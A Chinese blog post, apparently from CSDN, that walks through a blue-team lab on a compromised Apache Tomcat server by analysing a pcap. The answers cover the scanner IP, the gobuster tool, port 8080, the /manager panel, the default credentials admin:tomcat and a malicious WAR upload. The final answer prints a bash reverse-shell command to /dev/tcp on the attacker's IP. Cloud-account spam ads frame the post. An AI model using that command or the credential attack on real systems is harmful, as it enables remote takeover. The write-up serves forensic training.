Tomcat Takeover-CSDN博客

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

靶场介绍

蓝队靶场练习之Tomcat Takeover

场景介绍

我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况该团队捕获了网络流量进行分析。此pcap文件可能包含一系列恶意活动这些活动已导致Apache Tomcat Web服务器的危害。我们需要进一步调查这一事件

题目导航

image.png

题目一

鉴于在 Web 服务器上检测到可疑活动pcap 分析会显示跨不同端口的一系列请求这表明存在潜在的扫描行为。您能否确定负责在我们的服务器上发起这些请求的源 IP 地址
解题
在我们刚打开pcap包的时候就可以看到14.0.0.120所以我们直接对14.0.0.120进行分析
image.png
可以看到14.0.0.120在进行扫描并且工具是gobuster版本是3.6。这里可能会有师傅问为什么只关注14.0.0.120我一般情况下都会优先关注互联网IP本地IP会先放着。。。所以第一题的答案为

14.0.0.120

image.png

第二题

根据与攻击者关联的已识别IP地址您能否确定攻击者活动的来源城市
解题
我们根据IP查定位即可我一般使用的工具为cip.cc
https://www.cip.cc/
image.png
所以第二题答案为

guangzhou

image.png

第三题

根据 pcap 分析由于攻击者的活动扫描检测到多个开放端口。以下哪个端口提供对 Web 服务器管理面板的访问
解题
tomcat一般情况下是默认端口居多我们直接过滤8080进行测试
image.png

所以答案为

8080

image.png

第四题

在我们的服务器上发现开放端口后攻击者似乎试图枚举和发现我们 Web 服务器上的目录和文件。可以从在此枚举过程中帮助攻击者的分析中识别哪些工具
解题
这个第一题找IP的时候就知道本题答案为

gobuster

image.png

第五题

在他们努力枚举我们 Web 服务器上的目录之后攻击者发出了许多请求试图识别管理界面。攻击者能够发现与管理面板关联的哪个特定目录
解题
结合tomcat的知识直接就能猜到答案

/manager

image.png

第六题

在访问管理面板时攻击者尝试暴力破解登录凭据。从数据中能否识别出攻击者成功用于授权的正确用户名和密码组合
解题
根据管理页面来进行查找
image.png
image.png
解码
image.png
故本题答案为

admin:tomcat

第七题

进入管理面板后攻击者试图上传文件以建立反向外壳。你能从捕获的数据中识别出这个恶意文件的名称吗
解题
题目说上传我们直接查post数据包
image.png
image.png
所以本题答案为

JXQOZY.war

最后一题

在我们的服务器上成功建立反向外壳后攻击者旨在确保受感染机器上的持久性。从分析中您能否确定它们计划运行的特定命令以保持其存在
解题

/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6
标签: Tomcat